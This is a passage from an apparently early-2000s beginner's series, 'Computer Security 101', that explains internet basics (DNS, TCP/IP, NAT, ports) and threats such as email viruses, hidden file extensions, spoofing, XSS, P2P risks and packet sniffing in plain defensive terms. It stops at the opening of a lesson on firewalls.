In order to better secure your home computer or home network it helps if you have some basic knowledge of how it all works so you can understand what exactly you are securing and why. This will be the first in a 10-part series to help provide an overview of the terms and technology used and some of the tips, tricks, tools and techniques you can use to make sure your computer is secure.
To begin with, I want to provide some understanding of what these terms are so that when you read about the latest malicious code spreading through the Internet and how it gets into and infects your computer you will be able to decipher the techie terms and determine if this affects you or your computer and what steps you can or should take to prevent it. For Part 1 of this series we will cover Hosts, DNS, ISP’s and Backbone.
The term “host” can be confusing because it has multiple meanings in the computer world. It is used to describe a computer or server that provides web pages. In this context it is said that the computer is “hosting” the web site. Host is also used to describe the companies that allow people to share their server hardware and Internet connection to share these as a service rather than every company or individual having to buy all their own equipment.
A “host” in the context of computers on the Internet is defined as any computer that has a live connection with the Internet. All computers on the Internet are peers to one another. They can all act as servers or as clients. You can run a web site on your computer just as easily as you can use your computer to view web sites from other computers. The Internet is nothing more than a global network of hosts communicating back and forth. Looked at in this way, all computers, or hosts, on the Internet are equal.
Each host has a unique address similar to the way street addressing works. It would not work to simply address a letter to Joe Smith. You have to also provide the street address- for example 1234 Main Street. However, there may be more than one 1234 Main Street in the world, so you must also provide the city- Anytown. Maybe there is a Joe Smith on 1234 Main Street in Anytown in more than one state- so you have to add that to the address as well. In this way, the postal system can work backward to get the mail to right destination. First they get it to the right state, then to the right city, then to the right delivery person for 1234 Main Street and finally to Joe Smith.
On the Internet, this is called your IP (Internet protocol) address. The IP address is made up of four blocks of three numbers between 0 and 255. Different ranges of IP addresses are owned by different companies or ISP’s (Internet service providers). By deciphering the IP address it can be funneled to the right host. First it goes to the owner of that range of addresses and can then be filtered down to the specific address its intended for.
I might name my computer “My Computer”, but there is no way for me to know how many other people named their computer “My Computer” so it would not work to try to send communications to “My Computer” any more than addressing a letter simply to “Joe Smith” would get delivered properly. With millions of hosts on the Internet it is virtually impossible for users to remember the addresses of each web site or host they want to communicate with though, so a system was created to let users access sites using names that are easier to recall.
The Internet uses DNS (domain name system) to translate the name to its true IP address to properly route the communications. For instance, you may simply enter “yahoo.com” into your web browser. That information is sent to a DNS server which checks its database and translates the address to something like 22.214.171.124 which the computers can understand and use to get the communication to its intended destination.
DNS servers are scattered all over the Internet rather than having a single, central database. This helps to protect the Internet by not providing a single point of failure that could take down everything. It also helps speed up processing and reduce the time it takes for translating the names by dividing the workload among many servers and placing those servers around the globe. In this way, you get your address translated at a DNS server within miles of your location which you share with a few thousand hosts rather than having to communicate with a central server half way around the planet that millions of people are trying to use.
Your ISP (Internet Service Provider) most likely has their own DNS servers. Depending on the size of the ISP they may have more than one DNS server and they may be scattered around the globe as well for the same reasons cited above. An ISP has the equipment and owns or leases the telecommunications lines necessary to establish a presence on the Internet. In turn, they offer access through their equipment and telecommunication lines to users for a fee.
The largest ISP’s own the major conduits of the Internet referred to as the “backbone”. Picture it the way a spinal cord goes through your backbone and acts as the central pipeline for communications on your nervous system. Your nervous system branches off into smaller paths until it gets to the individual nerve endings similar to the way Internet communications branch from the backbone to the smaller ISP’s and finally down to your individual host on the network.
If something happens to one of the companies that provide the telecommunications lines that make up the backbone it can affect huge portions of the Internet because a great many smaller ISP’s that utilize that portion of the backbone will be affected as well.
This introduction should give you a better understanding of how the Internet is structured with the backbone providers supplying communications access to the ISP’s who in turn supply that access to the individual users such as yourself. It should also have helped you understand how your computer relates with the millions of other “hosts” on the Internet and how the DNS system is used to translate “plain-English” names to addresses that can be routed to their proper destinations. In the next installment we will cover TCPIP, DHCP, NAT and other fun Internet acronyms.
In Computer Security 101 ™– Lesson 1 we discussed Hosts, DNS, ISP’s and Backbone. This is the second in a series designed to provide you with a basic understanding of the technology and terminology used on the Internet. Knowing why things work the way they do and what they are called will help you to secure your computer or network against new threats. In this lesson we will cover protocols, TCP/IP, DHCP and NAT.
Communications on the Internet and between computers is governed by protocols. The Merriam-Webster Dictionary defines a protocol as “a set of conventions governing the treatment and especially the formatting of data in an electronic communications system.” I’m not sure that makes things much clearer to a lay-person.
Put simply, if you called an orange an apple and I called it a plum we would never be able to communicate. At some point we have to come to some agreement as to what to call it. For computers and the Internet there were many organizations coming up with their own proprietary way of formatting and transmitting data. In order to ensure that all computers would be able to talk to each other and not just to their “own kind” protocols were created and agreed to.
TCP/IP, which stands for Transmission Control Protocol Internet Protocol is not a single protocol. It is a set of communication standards. TCP and IP are the two main protocols of the bunch. TCP/IP has been accepted as the standard for Internet communications and comes packaged by default with all major operating systems.
In order to communicate using TCP/IP each Host must have a unique IP address. As we discussed in Lesson 1, your IP address is similar to your street address. It identifies your Host on the Internet network so that communications intended for you reach their destination.
Originally, IP addresses were manually coded to each computer. As the Internet exploded and millions of Hosts were added it became an overwhelming task to track which IP addresses were already in use or which ones were freed up when a computer was removed from the network.
DHCP, or Dynamic Host Configuration Protocol, was created to automate this process. A DHCP server is given a block of addresses that it controls. Hosts that are configured to use DHCP will contact the DHCP server when they are turned on to request an IP address. The DHCP server will check its database of addresses and find one that is not in use to assign to the Host. When the Host is turned off or removed from the network that IP address is released and the DHCP server can use it for a new Host.
The exponential growth of the Internet caused a shortage in the available IP addresses similar to the way the growth of cell phones, pagers and the like have caused a shortage of phone numbers. Unlike the phone system though, the Internet could not simply add a new prefix to the mix to create new phone numbers. While the next version of the IP protocol (IPv6) is designed to allow for an exponential increase in the number of available addresses, the current version (IPv4) was running dry fast.
In the meantime, NAT (Network Address Translation) can be used to expand the potential number of addresses. NAT essentially uses only one IP address to communicate on the Internet and a completely separate block of IP addresses on the local network. The local network addresses need to be unique from each other, but since the outside world will not see the local network addresses they don’t need to be unique to the world.
Without NAT a company with 100 computers that wanted all 100 to connect with the Internet would need to have 100 separate public IP addresses. That same company using NAT would only need 1 public IP address and would assign the computers on the local network internal IP addresses.
This “hiding” of the internal IP addresses works not only to allow for more Hosts to share the Internet, but also as a layer of security. By not allowing the outside world to know the precise IP addresses of your internal Hosts you take away a key piece of information that hackers could use to break into your network.
Now that we have talked about how protocols help standardize communications so that different computers can talk to each other and how TCP/IP is the collection of protocols used to communicate on the Internet we can start to look at how these things can be exploited and used against you. We also discussed how DHCP dynamically assigns IP addresses to Hosts and how NAT can be used to increase the number of Hosts that can connect to the Internet through one IP address while also hiding your internal network from the world. The next lesson will cover TCP, UDP, Ports and Firewalls.
Welcome back! This is our third lesson in Computer Security 101 ™, a series of simple lessons to provide you with a basic overview of the terminology and technology used everyday on the Internet. My hope is that if you understand the acronyms and how things work you will be better able to understand when there is a threat and how to protect your system against that threat.
In Lesson 2 we discussed Protocols, TCP/IP, DHCP and NAT. This lesson will build on the TCP/IP protocol by discussing Ports, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) and then wrap up with a simple discussion of firewalls.
To start off, ports are like channels for communications. When you sit down to watch TV you have to tune your TV to a specific frequency in order to view the Weather Channel. If you want the Disney Channel you need to change to a different frequency. To view CNN you would need to set your TV to yet another frequency.
Similarly, when surfing the Internet there is a certain port that is used when your computer wants to receive HTTP (Hypertext Transfer Protocol used for viewing HTML or web pages) traffic. To download files you might use FTP (File Transfer Protocol) which would be received on a different port. SMTP (Simple Mail Transfer Protocol used for transmitting email messages) communications would be received on a different port.
There are 65536 ports available for use in TCP or UDP. They are divided into three ranges. The Internet Assigned Numbers Authority (IANA) manages the first 1024 ports (0 – 1023). This range is known as the Well Known Port Numbers and includes standard default ports like HTTP (port 80), FTP (port 21) and SMTP (port 25). These port numbers are reserved and should not be used arbitrarily.
The second range is the Registered Port Numbers which contains ports 1024 through 49151. The Registered Port Numbers can be used by ordinary programs and user processes that are executed by the user. The use of specific port numbers is not carved in stone. These ports are generally used transiently when needed.
The third range is the Dynamic or Private Port Numbers which range from 49152 through 65535. These can be used by applications and processes initiated by the user but it is uncommon. There are known Trojan horse and backdoor programs that use this extreme upper range so some security administrators are leery of traffic in this range.
One of the protocols that uses this block of ports is TCP. TCP allows two hosts on the Internet to establish a connection with each other. One host will initiate the connection by sending a request to the other. That host will respond back agreeing to establish the connection. Finally, the originating host will respond once more to acknowledge receipt of the acceptance and the connection is established.
When data is fed to TCP, TCP breaks it into smaller, more manageable pieces called packets. A header is written for each packet which specifies the originating IP address, the destination IP address, the sequence number and some other key identifying information.
When the packets leave to traverse the Internet and get to their destination they may not take the same path. There are thousands of routers and complex algorithms help to decide from nanosecond to nanosecond which path is going to be the best path for the next packet. This means that the packets may not arrive at their destination in the same order they were sent out. It is the responsibility of the TCP protocol on the receiving end to look at the sequence number in the packet headers and put the packets back in order.
If there are missing packets error messages are sent back to let the sending computer know to resend the data. TCP also does flow control by sending messages between the two hosts letting them know to speed up or slow down the rate of sending packets depending on network congestion and how fast the receiving computer can handle processing the incoming packets.
UDP is another protocol that works with IP networks. Unlike TCP, UDP does not establish a connection. UDP does not provide any sort of error protection or flow control. It is primarily used for broadcasting messages. The sending host gets no acknowledgement that the message was successfully received.
Because UDP does not take the time to set up a connection between the two hosts, perform flow control to monitor network congestion or do the sort of error-checking and receipt acknowledgement that TCP does, it has much less overhead in terms of time and resources. Some services that benefit from this are DNS, SNMP and streaming multimedia (for example watching a video clip over the Internet).
Now that we have covered TCP, UDP and ports we can move on to discussing firewalls. A basic firewall is designed to block or control what traffic is allowed into or out of your computer or network. One way to do this is to simply block all incoming TCP and UDP traffic on all ports. For many home users this will work just fine. The firewall will still allow a response using the TCP or UDP ports through as long as the connection was initiated by your computer, but blocking in this manner will make sure no external computers can initiate a session with your computer.
If you do want to host a web site, or allow files to be downloaded from your computer using FTP or allow other computers to connect to yours for online gaming, you would need to open the respective port. For example, to host a web server you would configure your firewall to block all incoming UDP and TCP traffic on all ports except port 80. On most basic home Cable / DSL routers the port-blocking firewall can be configured to allow traffic through a port to a specific host so that your other computers would still be protected from this sort of traffic, but external hosts would be able to access your web server or game connection or whatever else you wanted.
This sort of basic firewall has some issues that can be exploited by hackers and malicious programmers to sneak through which is why there are more advanced firewall systems. I mentioned that with this sort of port blocking, communications in response to connections initiated by your computer would be allowed through even on ports you were blocking. Using this knowledge, a hacker can forge the packet to make it look like it is a reply rather than an initiation of a connection and the firewall will allow it through.
Even on connections that ARE initiated by your computer, a malicious programmer can still exploit weaknesses in the system to sneak packets through. To guard against some of these weaknesses there are other types of firewalls- stateful inspection packet filters, circuit level gateway and application level gateways to name a few. For more details on firewalls see the article What Is A Firewall?.
Another consideration for firewalls is that it is not always enough to monitor or block inbound traffic. You may get a virus or Trojan horse program through a connection you initiated, thereby bypassing the firewall, or through email. These malicious programs can open ports and initiate connections FROM your computer once they are planted there. Most software based firewalls like Zone Alarm or Sygate (Top Software Firewall Products) or more advanced hardware based firewalls will monitor outbound connections as well.
That does it for Lesson 3. We have completed an overview of ports and some of the common uses, the TCP and UDP protocols and a quick look at how firewalls work. In Lesson 4 we will cover email security, email borne viruses, hidden file extensions and email spoofing. Come back soon.
The Computer Security 101 series is a 10-part series of articles intended to provide the security novice with a basic understanding of the terminology, acronyms and technology involved. The hope is that if you understand how and why things work in the first place you will be able to protect and secure those things better.
In our third lesson of Computer Security 101 we covered Ports, TCP, UDP and firewalls. This lesson we will discuss various security issues associated with using email including email borne viruses, hidden file extensions and email spoofing.
One of the main attack vectors for a virus is through your email. While it is possible to get a virus by using an infected floppy disk or compact disc one of the main methods of propagation is through email. From the standpoint of trying to do the most damage it makes sense for a virus author to use email as a means for spreading the virus.
The authors of Trojans, worms and viruses are sometimes exceptionally clever and ingenious in finding and exploiting weaknesses in both the computer system and in human nature in order to make their attack successful. Unfortunately, sometimes even viruses that aren’t so clever manage to spread quickly and do lots of damage due to uneducated and naïve users.
To get you to open the email in the first place viruses try to use Subject Lines for the email messages that will get your attention. Some will come disguised as important alerts from major companies like Microsoft. Recent viruses will also reply to existing emails in the infected computer. When you receive a message in response to a message you know you sent someone you have no reason to suspect it would be harmful so you are more likely to open it.
Typically, the email itself is not the problem. The Subject Line and the Message Body are worded with the intent and goal of getting you to double-click on the attached file to execute the actual virus. With HTML-based email it is possible to embed the virus directly in the message. Major viruses and worms in the past couple of years like CodeRed and Nimda have exploited this flaw to cause the virus to execute as soon as someone opened the email message, rather than waiting for them to click on the attachment. In 2001 Microsoft released a Security Bulletin, MS01-020, including a patch to protect users from this happening.
As users became educated (although it can be debated what percentage of the users are really educated) about clicking on file attachments the malicious code writers had to change their strategy. It became known that executable files like EXE (Executable), COM (Command), BAT (Batch) and other file types like these would run a program once they were clicked on and that you should not open those types of attachments if you didn’t know who they were from and why.
Being quite clever, the virus writers figured out that they could hide the true file extension to trick the user. Microsoft Windows is set automatically to hide known file extensions. So, extensions like EXE and VBS (Visual Basic Script) don’t show up by default. Even if a user elects to Show Hidden Files and Folders there are some that will not show up.
In the Registry there is a value called “NeverShowExt” which will keep file types like LNK (Microsoft shortcut links) and SHS (Shell Scrap Objects) from being displayed even if you opt to show all files.
By using double or hidden file extensions more malicious viruses were able to wreak havoc on end users computers through email. After learning that not all file attachments could be trusted and then being further duped into executing malicious files anyway through hidden file extensions, users learned not to open attachments in emails that weren’t from someone they know and trust.
Malicious code writers quickly alleviated that problem by creating the viruses so they would propagate from users known by the end user. The viruses would read all of the addresses in a user’s address book and send itself to all of them thereby looking as if they came from someone known.
One problem with this method when it comes to wanting your virus to spread as far and as fast as possible is that the user who receives an infected email from a friend can simply call that friend and let them know they are transmitting a virus. Then that user will disconnect their computer from the Internet, clean the virus up and there will be one less computer to propagate the threat.
Email spoofing is used by virus writers to get around this little problem. The virus will still scan various files on the infected computer to look for addresses to send to- email address books, the Windows address book, email in the users inbox, or sent mail box, and even HTML pages cached on the computer. But, rather than sending the email “from” the infected user, the virus will also randomly select an email address to forge as the “from” address.
When the email is sent the recipient may detect that it is infected and contact the user that allegedly sent it only to find out that the email did not really come from them. On a simple level, it is possible to simply configure your email account so that the name and email address associated with it belong to someone else. When you send a message it will show up with the name you tell it to and reply to the email address you specify. Because this information is so easy to fake it can’t be relied upon.
The bottom line with email is to be careful. Always run antivirus software and ensure that it is kept up to date with the latest virus files from the software vendor. Equally, or more important, keep your system patched against known vulnerabilities. The major virus and worm threats of the past couple years have exploited vulnerabilities for which patches were available for months. If all users would have patched when the patch became available the virus or worm would have been powerless.
Think twice about executing file attachments to email- consider the source and the message body and the file attachment type and if you are at all suspicious contact the alleged sender to verify the reason for the attachment before opening it. Watch out for broken English and message bodies that don’t make any sense. Also beware of claims that Microsoft is sending you a patch or that Intel is writing to let you know about the next great virus. Microsoft sends out bulletins, but never emails the actual patch as an attachment and Intel isn’t in the business of detecting or alerting users about viruses. Clues like these should tell you that the message is either a hoax or it’s a virus and in either event you should simply delete it and go about your day.
With this lesson we reach the half-way point of our 10-part series: Computer Security 101. The series provides a simple overview of the technology, terminology and acronyms used everyday regarding computer systems and the Internet. The goal of the series is that by having an understanding of what the technology is called and what it does you will be able to understand when there is a threat that affects you and take the appropriate steps to secure your computer system.
About 10 “people years” (or about 60 years ago in “web years” according to the FAQ on Tim Berners-Lee’s web site) ago the World Wide Web was text-based. In 1989 Tim Berners-Lee began creating a global hypertext project. By the summer of 1991 the World Wide Web was born and released to the Internet at large.
The Hypertext Markup Language (HTML)used to create the web pages continued to be refined. By late 1992 Marc Andreessen and the NCSA team created X-Mosaic. Mosaic introduced the “img” tag which allowed graphics to be inserted into the web pages as well. This brought on the explosive growth and popularity of the World Wide Web, however the pages were still static- meaning they only showed whatever they were programmed to show in the first place.
In order to provide more functionality- whether for business or entertainment- companies needed to find a way to make the pages dynamic. They wanted to be able to present new information or update the information on the screen automatically. Active scripting was created to fulfill this need.
The concept and functionality of scripting languages has grown since these two initial scripting languages were introduced. Always the goal has been to find more and better ways to dynamically update the web page with information that is new or unique to the user. To do this the scripting languages had to be able to pull information from the client computer or sometimes from databases housed on the server. The scripts are small programs that execute within the HTML code.
It is an unfortunate fact that many of the features developed to make computing easier, more functional or more entertaining can be turned around and exploited for malicious purposes. Some sites that you visit may actually require active scripting to function properly. When using a web browser like Internet Explorer you can change the settings so that by default active scripting is not allowed. You can then add sites that require active scripting and that you feel are safe to your Trusted Sites security zone (See How To Configure Internet Explorer Security).
Another facet of dynamic content creating security issues is through cross site scripting (XSS). Sites that allow users to input data and don’t properly check for malicious script tags may be vulnerable to XSS attacks. Using XSS an attacker could get the server to redirect your connection to another web site entirely which could contain other malicious active scripting programs.
Typically the XSS attack is instigated by getting the targeted user to click on a link which contains malicious code. If the web site does not validate the script code or check it for malicious content the script will be executed and the attacker could cause all sorts of problems including stealing passwords or executing other programs on the target machine.
Cross site scripting vulnerabilities are not associated with any particular browser or web server. It doesn’t matter if the web site is hosted on Microsoft Internet Information Server (IIS) or Apache. It doesn’t matter whether you browse with Internet Explorer, Netscape or Opera. The problems that create XSS vulnerabilities lie in the way dynamic pages are generated and not having the proper checks and balances in place to validate the code before sending the output to the user.
Some more recent creations commonly used on the Internet are Instant Messaging (IM) and Peer-to-Peer (P2P) Networks. Instant messaging essentially dates back to the invention of Internet Relay Chat (IRC) by a student in Finland in 1988. IRC caught on fast and expanded around the world. In the early 1990’s online service providers like America Online (AOL) and Compuserve used proprietary instant messaging programs and allowed their users to create “buddy lists” of friends and family so they could see who was online at the time. In 1996, ICQ (A play on words meaning “I Seek You”) was released and made freely available. The advent of a buddy-list style instant messaging program that wasn’t tied to any proprietary online service sparked the explosion of instant messaging. Eventually AOL bought ICQ and Compuserve, but other competitors popped up including Yahoo Messenger and Microsoft’s MSN Messenger programs.
Because using IM software requires you to have a service connected to the Internet on an open port, it offers an attack vector for hackers. The IM software tends to have security flaws and vulnerabilities that allow for malicious attacks. In January of 2002 a flaw was announced in AOL Instant Messenger which would allow the attacker to gain access to your system without notifying you, giving you an opportunity to deny the connection or providing any means for tracking the attack. In June of 2002 CERT released an advisory regarding a vulnerability in Yahoo Messenger that would allow an attacker to execute the code of their choice on your computer. The list is long and growing of ways that Instant Messaging software can be used to compromise your system.
Originally, instant messaging was just a means for communicating in real time with other instant messaging users. However, more functionality was added to instant messaging as its popularity grew. IM clients generally have the capability to send and receive files or designate a folder to share out files to your buddy list. Because downloading files in this manner bypasses most corporate security measures many companies have implemented policies banning the use of IM software until a traceable, secure system can be found.
Peer-to-Peer (P2P) networking is a phrase coined to apply to individual PC’s acting as servers to other individual PC’s. In a P2P network all of the computers are peers to each other and are able to act as file servers. Katherine Mieszkowski of Salon was quoted as saying “P2P is a particularly comical new coinage for a business model since the phrase starkly points out that there’s no middleman – so how can anyone possibly make any money?” P2P was made popular primarily by the digital music swapping sysem created by Shawn Fanning- Napster.
Napster spread like wildfire and other P2P file swapping networks sprung up in its wake. Eventually the Recording Industry Association of America (RIAA) managed to have Napster effectively shut down due to litigation over copyrighted songs being made available through the Napster network. The RIAA may have brought on the untimely demise of Napster (although the phoenix may yet rise from the ashes- in February 2003 Roxio announced plans to resurrect Napster as service to allow songs to be downloaded for a fee Napster Rising From The Grave), but more P2P networks are out there and the juggernaut has too much momentum for the entertainment industry to be able to effectively litigate it away.
With more popular P2P file sharing networks out there like Morpheus, GNUtella and Kazaa users around the globe have installed the client software to allow their machines to act as file servers to the P2P community and allow them to access the files of other computers on the P2P network. Again, the fact that computers participate on one of these P2P networks means they must have certain ports open on their networks or computers. In this case they generally will have at least one folder on their computer shared out as well. Having open ports and open file shares offers another prime target for malicious developers to exploit.
In February of 2002 a Denial-of-Service vulnerability was announced that affected users of Kazaa, Morpheus and Grokster. By exploiting this vulnerability an attacker could cause the system to exhaust available resources and crash. It is also possible for users who are not members of the P2P network to connect to your computer using the port opened by the P2P network and access the files or folders you have made available. Some novice computer users have installed P2P networks listing the root “C:” drive as their main sharing folder which makes all of the system files and other critical data available to anyone on the P2P network.
The last topic for this lesson is packet sniffing. Packet sniffing, like most maligned services and applications, serves a legitimate purpose when used in the right way. Packet sniffing can be invaluable in determining problems and troubleshooting issues on your network. However, in the wrong hands a packet sniffer is to your Internet traffic essentially the same as someone tapping your phone conversations.
A packet sniffer captures the individual packet data flowing across a network. Most decent packet sniffer applications will decode the binary data into something intelligible. Some carry it a step further to do protocol analysis and can help identify key information that may be useful. By capturing and decoding packets in this manner a hacker can learn a lot of valuable information about your network and possibly capture passwords or confidential personal data like credit card numbers.
In order to work the packet sniffer must be on the same network as the originating or intended destination machine. However, if a hacker has managed to install some sort of Trojan horse or backdoor program on one of the computers on either the sending or receiving networks they may be able to do the packet sniffing remotely. A switch will provide better protection against being detected from a 3rd-party machine because the network traffic only goes to its intended destination. If the network traffic goes across a hub, that traffic is broadcast to all devices attached to the hub and can therefore be intercepted by any of them.
That does it for Lesson 5. Hopefully you now have a better understanding of the concepts behind active scripting, cross site scripting, instant messaging, P2P networks and packet sniffing. I have provided some quick tips to try and help you protect yourself. More in depth security solutions will be provided in lessons 8, 9 and 10. Lesson 6 will be devoted entirely to antivirus software.
The goal of the Computer Security 101 series is to provide an introduction into the basic technology and the terminology and acronyms associated with computers and networks. Armed with an understanding of these things users will be better prepared to defend against existing or potential threats to their computer and network security.
Within the space of a single introductory article it is impossible to cover every aspect of the virus / antivirus topic. I will attempt to provide as much knowledge as I can without overwhelming you. For those of you who would like more in-depth information and detail about how viruses or antivirus works I suggest taking a look at the links to the right of this article.
To begin with we should introduce some terms common to antivirus issues and clarify the distinctions between each of them. The first and primary term is Virus. A virus is malicious code that replicates itself. New viruses are discovered daily. Some exist simply to replicate themselves. Others can do serious damage such as erasing files or even rendering the computer itself inoperable.
A Worm is similar to a virus. They replicate themselves like viruses, but do not alter files like viruses do. The main difference is that worms reside in memory and usually remain unnoticed until the rate of replication reduces system resources to the point that it becomes noticeable.
A Trojan (or Trojan horse) is called such as a reference to the story of the Trojan horse from Greek legend. It is a malicious program disguised as a normal application. Trojan horse programs do not replicate themselves like a virus, but they can be propagated as attachments to a virus.
The term Backdoor is used to describe a secret or undocumented means of getting into a computer system. Many programs have backdoors placed by the programmer to allow them to gain access to troubleshoot or change the program. Some backdoors are placed by hackers once they gain access to allow themselves an easier way in next time or in case their original entrance is discovered.
Malicious code is a catch-all term used to refer to various types of software that can cause problems or damage your computer. The more common classes of programs referred to as malicious code are the previously mentioned viruses, worms, Trojan horses, macro viruses, and backdoors. But, malicious code can also be used as a general term to refer to other malicious or destructive programs not covered by those definitions
A biological virus spreads from host to host by replicating. In other words, the virus attaches itself to a healthy cell and more or less hijacks the cell. Once it has taken control of the cell it begins to replicate itself- creating more and more copies of the virus which in turn will create more copies of the virus. Eventually, through a sneeze, a cough or a handshake, the infected cells make their way to new hosts and begin the process again.
Computer viruses were named such because of their similarities to the biological virus process. A virus program will attach itself to good or healthy files on the computer system and proceed to spread and infect other files on the system. Eventually, through email, open ports or network shares, the infected files make their way to new hosts and begin the process again.
There are various areas of the computer that can be infected by a virus or malicious code and there are various methods defined for how the infection occurs. The information below is from the Computer Knowledge Virus Tutorial (cknow.com). There may be other lists or terms, but these listings of what and how viruses infect are fairly comprehensive:
What Viruses Infect
System Sector Viruses: These infect control information on the disk itself.
File Viruses: These infect program (COM and EXE) files.
Macro Viruses: These infect files you might think of as data files. But, because they contain macro programs they can be infected.
Companion Viruses: A special type that adds files that run first to your disk.
Cluster Viruses: A special type that infects through the disk directory.
Batch File Viruses: These use text batch files to infect.
Source Code Viruses: These add code to actual program source code.
Visual Basic Worms: These worms use the Visual Basic language to control the computer and perform tasks.
How Viruses Infect
Polymorphic Viruses: Viruses that change their characteristics as they infect.
Stealth Viruses: Viruses that try to actively hide themselves from antivirus or system software.
Fast and Slow Infectors: Viruses that infect in a particular way to try to avoid specific anti-virus software.
Sparse Infectors: Viruses that don’t infect very often.
Armored Viruses: Viruses that are programmed to make disassembly difficult.
Multipartite Viruses: Viruses that may fall into more than one of the top classes.
Cavity (Spacefiller) Viruses: Viruses that attempt to maintain a constant file size when infecting.
Tunneling Viruses: Viruses that try to “tunnel” under anti-virus software while infecting.
Camouflage Viruses: Viruses that attempted to appear as a benign program to scanners.
NTFS ADS Viruses: Viruses that ride on the alternate data streams in the NT File System.
There are well over 50,000 known viruses currently, but only a couple hundred that are actively spreading in the wild (a term used to describe a virus that is live on the Internet). A number of the couple hundred are actually different variants of the same virus which could reduce that number more depending on how you want to count. To get an updated monthly report of the viruses being seen in the wild, visit The WildList Organization.
Most viruses do not do much, or any harm. Many exist just for the sake of proving that the author was capable of creating a virus that can spread from machine to machine. Some non-damaging viruses may simply be tests of the virus code’s ability to spread so the author can work out any bugs before adding the destructive payload.
Even a virus that does no inherent damage to an infected machine can have a huge negative impact on the Internet at large. In late January of 2003 a worm hit the Internet called SQL Slammer. It took advantage of a known vulnerability in Microsoft SQL Server and spread around the world in less than an hour.
It did no damage to the infected machine per se, but the speed and volume of connections that an infected machine initiated grew exponentially as more machines became infected and caused so much congestion of traffic that it all but shut down the Internet for a few hours.
To guard and protect your computer from known virus, worm and other malicious code threats you need to have antivirus software installed and actively running. You also must keep it updated. New viruses are discovered almost daily. Running antivirus software that hasn’t been updated in a month or more is equivalent to not running antivirus software at all.
The antivirus vendors analyze new malicious code threats as they are discovered. They look for pertinent information that makes the threat unique- size of the file, specific text in the file, message body or subject line, specific ways the file works, etc.- and create a signature or footprint that will identify this threat. These signatures are included in the update files put out by the antivirus vendors. Most vendors update their virus definitions at least weekly.
Identifying the signature of the threat and including it in the updated virus definitions is great for catching known threats, but how do you stop a virus or worm that hasn’t yet been detected and catalogued by the antivirus software vendors? To do this, most vendors use heuristic analysis. Heuristics uses past experience to make educated guesses about the present. Using rules and decisions based on analysis of past network or email traffic, heuristic scanning in antivirus software can self-learn and use artifical intelligence to attempt to block viruses or worms that are not yet known about and for which the antivirus software does not yet have a filter to detect or block.
There are many products available on the market to help you protect your computer. McAfee VirusScan from Network Associates and Norton Antivirus from Symantec are two of the most recognized names in antivirus software. There are plenty of other options though such as Sophos or F-Secure as well as free options for those who want to protect their computers on a tight or non-existent budget.
You must always be conscious of the email messages you are viewing and who they are from, particularly before opening any file attachments that may be associated with them. Viruses tend to rely on social engineering to get the user to help them spread. In order for the virus to infect your machine and spread to other machines it first needs to execute. The subject line and body of the email message are key to catching the recipients interest and tricking them into opening and running the file attachment.
There are a variety of tricks used by viruses to convince the user to open an attachment. Viruses may come disguised as a reply to a legitimate message you had sent the infected user. The viruses generally search many areas of a computer to collect any email addresses available on the infected machine so it can broadcast itself out to them. Many times a virus will come from an address you recognize and trust.
You should remain aware even if you recognize the email address or know the individual allegedly sending the email. Ask yourself if this person would normally send you a message like the one you received? Does this person normally send you file attachments? Does this person have a reason for sending this particular file attachment? If you are the least bit suspicious about any of this, you should contact the user and ask for clarification of the purpose of the attachment before opening it.
Newer viruses tend to do email spoofing though. By forging the “From” address to appear as if it came from a different source it becomes more difficult to identify the infected machine. If the virus is from a spoofed email address you may not be able to identify the true source. If you find that the message did not come from who it says it came from, you should probably assume it is malicious and simply delete it. In any event, if you can’t get a hold of the user you should at least use an updated antivirus program to scan the file before executing it.
While viruses are a serious issue, and it is imperative that users run antivirus software and keep it updated to detect and block new threats, it is equally or more important that users stay current with security updates and patches from their operating system and program vendors. In the past few years the viruses or worms that have had the most impact, like SQL Slammer, have taken advantage of known vulnerabilities for which patches were already available. If users had applied the patches when they became available these viruses and worms would have had little to no effect rather than spreading throughout the world and causing millions of dollars of damage and lost time and productivity.
Using vendor services like Microsoft’s Windows Update site or Redhat’s email notification service you can stay up to date on current patches available. There are also many email lists available from vendors or 3rd-party security sites to help you stay on top of recently discovered vulnerabilities you should be aware of. Recent versions of Microsoft Windows also have an autoupdate feature which will check for Critical updates periodically and provide an icon in the systray when patches become available.
On the opposite end of the spectrum, but potentially almost as damaging, are virus hoaxes. These emails may be just a prank to see how far and how fast someone can get an email distributed around the world, or they could be a diversion to get users to let down their guard and ignore legitimate alerts- a sort of “boy that cried wolf” strategy.
One hoax that keeps coming back suggests that a file called jdbgmgr.exe that shows up with a teddy bear icon in Microsoft Windows is actually a virus file and that you should delete the file immediately and forward this message to everyone you know. Unfortunately, jdbgmgr.exe is a legitimate Windows file that is used for Java applets. Deleting the file won’t render the system inoperable, but it will remove some functionality and you may experience problems running Java applets as you surf the Web.
There are some key pieces of evidence you can look for to indicate that an email may be a hoax. First and foremost, if it asks you to forward this message to everyone you know, odds are it’s a hoax. If it claims to be a virus alert from Microsoft, it is probably a hoax (Microsoft isn’t in the virus / antivirus business and does not distribute virus alerts).
If you receive an alleged virus alert from any source you wouldn’t normally receive such information from, you should always check it out first. If you are in a company, you should notify the network or information security administrator only (do not forward the message to all of your friends and co-workers). If you are a home user or don’t have access to a security administrator there are a number of web sites that catalog known virus hoaxes that you can check to be sure before alerting anyone.
Viruses, worms, Trojans and other malicious code are pretty much here to stay. To protect yourself and your computer from becoming a statistic you need to take certain simple precautions. It is also important that you keep your system from helping to spread any new threat. To do this, you need to run updated antivirus software, keep your system patched and updated and preferably run some sort of hardware or software firewall program. For more information on these basic security measures, read Security Basics in a Home Computing Environment and In-Depth Security.
If you have read the rest of the Computer Security 101 ™ series thus far you already know that the goal is to provide an introduction to the basic technology and the terminology and acronyms associated with computers and networks. The series is designed with the hope and intent that, armed with an understanding of these things, users will be better prepared to defend against existing or potential threats to their computer and network security.
Lesson 6 was devoted entirely to virus and antivirus issues. While trying to be as comprehensive as possible, you can only squeeze so much information into one article. For more detailed information on all aspects of antivirus I recommend that you visit About.com’s Antivirus Software Site.
This lesson will focus on perimeter defense systems- primarily firewalls. We will cover some of the basic firewall techniques and technologies. We will also discuss Intrusion Detection Systems (IDS) and Honeypots. As with Lesson 6, these are all very broad topics and I can’t begin to fit every detail about them into one article- they could be a whole series in and of themselves. Check out the links to the right of this article for more information on these topics.
The original definition of a firewall according to the Merriam-Webster dictionary is “a wall constructed to prevent the spread of fire.” In a physical sense this includes designing building so that the walls, floors and ceilings are able to contain or at least slow down the spread of fire.
